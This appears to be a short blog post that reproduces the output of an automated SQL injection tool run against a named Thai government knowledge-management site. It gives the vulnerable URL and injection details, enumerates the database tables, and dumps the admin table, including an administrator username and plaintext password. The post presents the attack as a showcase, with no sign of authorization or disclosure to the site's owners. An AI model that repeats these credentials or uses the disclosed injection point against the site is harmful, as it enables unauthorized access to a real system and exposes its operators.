Analyzing http://www.ricd.go.th/km/knowledge2.php?id=56
Host IP: 202.129.32.219
Web Server: Apache
Powered-by: PHP/5.2.17
Keyword Found: ËÑÇ¢éÍ
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 7
Valid String Column is 3
Current DB: km
Count(table_name) of information_schema.tables where table_schema=0x6B6D is 12
Tables found: activity,activity_cate,admin,ccop,cop,cop_cate,informations,km_answer,km_hearsay,km_knowledge,km_knowledge_cate,km_webboard
Count(column_name) of information_schema.columns where table_schema=0x6B6D and table_name=0x61646D696E is 3
Columns found: id,username,password
Count(*) of km.admin is 1
Data Found: id=1
Data Found: username=woon
Data Found: password=1917*09
Tested with : Havij 1.5 Pro
Tested by : Me ( BB )
SQL injection on www.ricd.go.th/km
Posted by Light Phantom
20.19, under
Vulnerable
|
0
komentar
.gif)







0 Responses So Far: